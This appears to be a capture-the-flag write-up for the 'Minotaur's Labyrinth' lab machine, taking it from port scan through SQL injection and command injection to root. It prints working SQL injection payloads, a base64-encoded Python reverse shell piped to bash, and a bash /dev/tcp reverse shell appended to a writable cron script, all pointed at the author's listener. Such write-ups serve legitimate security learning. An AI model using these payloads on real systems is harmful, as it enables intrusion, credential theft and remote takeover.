Minotaur'sLabyrinth

7f003c9a2ad719ff3b589c44381ee5b6.png
Target IP: 10.10.141.146
Challenge Description:

8dff135e0ac972cc8b84df0106aba0f5.png


Reconnaissance

99fa68406c65aa553764191717df0b75.png
There are four TCP ports open on the target machine according to the nmap scan. I used the command sudo nmap -sS 10.10.141.146 -p- to accomplish this.

83dfb065527472798fc78fc952058aea.png
Performing an aggressive port scan using the command sudo nmap -sV -A 10.10.141.146 -p 21,80,443,3306 against the four TCP ports returns the result above. This scan returned interesting information such as the FTP allowing anonymous login access, HTTP and HTTPS applications on their standards port numbers, and a MySQL application on port 3306. I will begin enumeration with the FTP application on port 21 first.


Enumeration

Port 21: FTP
a429522835c57d294f7eedc7bad1d91d.png
Using the command ftp 10.10.141.146, I connected to the FTP application on the target machine as anonymous login. I used the command ls -la to view the contents inside this directory. There is a directory with the name pub that is accessible. Within this directory, there is a text file with the name message.txt and another directory with the name .secret. I downloaded the file message.txt on my machine using the command get.

4257d851d2e0fd5746d3ded4bb34bb9e.png
Inside the .secret directory, there are two more text files: flag.txt and keep_in_mind.txt. I transferred these files to my machine too using the command get. The flag.txt is possibly the first flag of this challenge.

Port 80: HTTP
ac6417e4817f7d49037f5adfc00f5b2e.png
The login webpage above is displayed for this web application. Since I do not have the login credentials, I will need to enumerate further. The source code of this webpage is interesting. I am able to view the JavaScript code for this login webpage. The file name is login.js.

16eff0c861997f2e8f572b7a033d9e27.png
The code of login.js is shown above. The function pwdgen() seems to generate the password for the user Daedalus. Since it is using char arrays, it is easy to obtain the password by indexing.

966686b405183f0ec7dbfb4d4065c879.png
I used Python IDLE to obtain the password g2e55kh4ck5r, as shown above. I pasted the three array characters and decoded it to string.

6755581d036f653a67fe27f517462ca3.png
Maybe I can use Daedalus:g2e55kh4ck5r against the login webpage.

309f352b98996870669f10217bbff5ae.png
And bingo! The webpage above was presented to me after logging in successfully using the credentials Daedalus:g2e55kh4ck5r. By the looks of it, the application seems to be pulling some sort of data from a backend database, probably the MySQL application on port 3306. Maybe it is vulnerable to SQL injection? Time to enumerate further.

3312e843532959f00a69b8d3039e2a14.png
I identified the total number of columns it is using is 3. The web application seems to throw the error No callback if the payload ' ORDER BY 4-- // is used, so 3 columns in the sweet spot. Using the payload ' UNION SELECT null, database(), user(), @@VERSION -- //, I managed to identify more information, such as the host & version, about the web application as shown above.

0e498932c653149363fc29709b874ee9.png
Using the payload ' UNION SELECT table_name, column_name, table_schema from information_schema.columns where table_schema=database() -- //, I identified the two table names: creatures and people as shown above. These two tables seem to be storing some sort of username and password. Maybe I can obtain it?

f9b1632123cf7e3dd7619e310636a9b2.png
Using the SQL injection payload ' OR 1=1-- //, I managed to obtain the dump the contents of the people table as shown above. I obtained the username and password hashes for all users from the table people. The last user seems the most interesting to me, as the naming convention is different.

a28a71ba3eee90b29595a2cf78dde71a.png
And using crackstation, I managed to crack the passwords as shown above.

df355e209c399067a9285814ecdf5325.png
Using the credentials M!n0taur:aminotauro, I gained access to the web application as shown above. This user has more privileges on the web application by the looks of it, as the flag & the directory with the name Secret_Stuff is shown above.


Exploitation

644278675d505d76b02895e4ec1bbe01.png
The Secret_Stuff webpage is shown above. It seems to be some sort of command application.

b215aad7c6a2cccb71672652d504d50c.png
Using the web application, I got it to echo the string hello world as shown above. Maybe it is vulnerable to command injection attacks? After multiple tests, I identified the web application is using some sort of filtering to prevent symbols.

339598dbf80a3ee38e797f56fa201940.png
One symbol that is not blocked is the pipe |, as shown above. Using the payload id|whoami|ls, I was able to perform command injection and obtain the list listings at the current directory. Since there is a heavy filtering in place, I can encode a reverse shell payload in base64 and get it to execute by the target machine.

5213b482920063baf82358019e5b661e.png
Gaining a foothold was simple too. I used a base64 encoded Python reverse shell for this. I noticed the = symbol is filtered too; therefore, I removed this. The Python base64 encoded reverse shell I used is cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjE0LjU1LjE1MyIsODQ0MykpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vc2giKSc= | base64 -d | bash. Now I have a foothold on the target machine with the session as daemon, as shown above.


Privilege Escalation

9dad89dc986a427691c13466cc469e83.png
During enumeration, I identified a directory with the name reminders as shown above. This directory has a text file with the name dontforget.txt. Is this the clue that I obtained from previous enumeration at FTP? Is this a cronjob?

b0a50a10961951d11ee3f4cad331e97d.png
I found another weird directory with the name timers. This directory has a script with the name timer.sh. This script is responsible for adding the string entries to the dontforget.txt text file. Since I have write permissions over the timer.sh, can I place a reverse shell code here?

d0e36e7e74197d24746c5f993e0e7235.png
And bingo! Now I have a root reverse shell connection from the target machine on my machine at port 8444. I inserted the bash reverse shell /bin/bash -i >& /dev/tcp/10.14.55.153/8444 0>&1 using the echo command echo '/bin/bash -i >& /dev/tcp/10.14.55.153/8444 0>&1' >> timer.sh inside the timer.sh file. Then I started a listener on my machine at port 8444. In the image above, I insert the bash reverse shell at top terminal. Then I catch the reverse shell at the bottom terminal. GG.


Flags

e9ebef09f6cdbb8f2cd18f36e2bf06e1.png
The first flag is shown above. This flag is obtainable from the FTP application via anonymous login.

0ded002a0394e3d7c247cabac309fc60.png
The second flag is shown above. The flag is next to the circle in the image above.

cdfa20e96ff4498a17e0230cd82858d0.png
The user flag is shown above.

e3849f490243f7fbe2acc2f289b28a01.png
The root flag is shown above.